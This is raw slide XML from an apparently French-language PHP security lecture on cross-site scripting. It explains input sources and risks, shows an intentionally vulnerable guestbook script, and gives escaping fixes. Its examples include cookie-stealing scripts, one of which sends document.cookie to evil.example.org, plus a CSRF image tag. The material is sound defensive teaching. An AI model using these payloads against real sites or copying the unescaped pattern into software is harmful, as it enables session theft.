                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>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3">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="20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Cross-Site Scripting XSS</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Si le site affiche du contenu qui provient d'une source extérieure sans le filtrer de manière adéquate, le site est vulnérable aux attaques XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L’entrée est stockée brute puis affichée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Ex : commentaires de blog. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les entrées utilisateur en PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" smtClean="0"/>
              <a:t>$_GET : variables de l’URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$_POST : données de formulaires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$_COOKIE : cookies du navigateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$_REQUEST : mélange de GPC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$_FILES : fichiers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>uploadés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$_SERVER : entêtes HTTP, URL. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$_ENV : environnement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>entrées indirectes : DB, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, web services. . .</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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XSS Risques</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Au premier abord, le risque semble peu critique, mais :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Modification de la page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>DOM peut tout modifier sur la page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>’).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>=’Ce site est nul’ ;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Afficher un site externe avec une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Couper l’accès à la page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>=’...’ ;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Attaque CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>="http://victim.site/..." /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Vol de cookie (et donc de session)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>=’... ?cookie=’ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> ;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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a:xfrm>
            <a:off x="533400" y="2968352"/>
            <a:ext cx="7851648" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="9600" dirty="0" smtClean="0"/>
              <a:t>Introduction à la sécurité PHP</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="44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XSS - exemple</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1935480"/>
            <a:ext cx="8472518" cy="4708230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;input type="text" name="message"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;input type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>« &gt; &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($_GET['message'])){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>('./messages.txt', 'a');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, "{$_GET['message']}&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>readfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>('./messages.txt');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Message :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = 'http://evil.example.org/steal_cookies.php?cookies=' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Solution : $message = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($_GET['message']);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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XSS – Solution </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Ne jamais afficher directement des données client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Afficher les données filtrées : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>(output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Échappement HTML)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Quelques fonctions utiles pour produire du HTML :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Protéger les caractères sensibles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> ($var);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Protéger tous les caractères </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> ($var,...); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>mb_htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($var,...);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Texte simple Enlever les balises HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strip_tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> ($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Dans un attribut HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Si la valeur est entre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>", alors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> suffit.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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XSS – Solution </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>rich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>text</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Filtrer le HTML saisi </a:t>
            </a:r>
            <a:r>
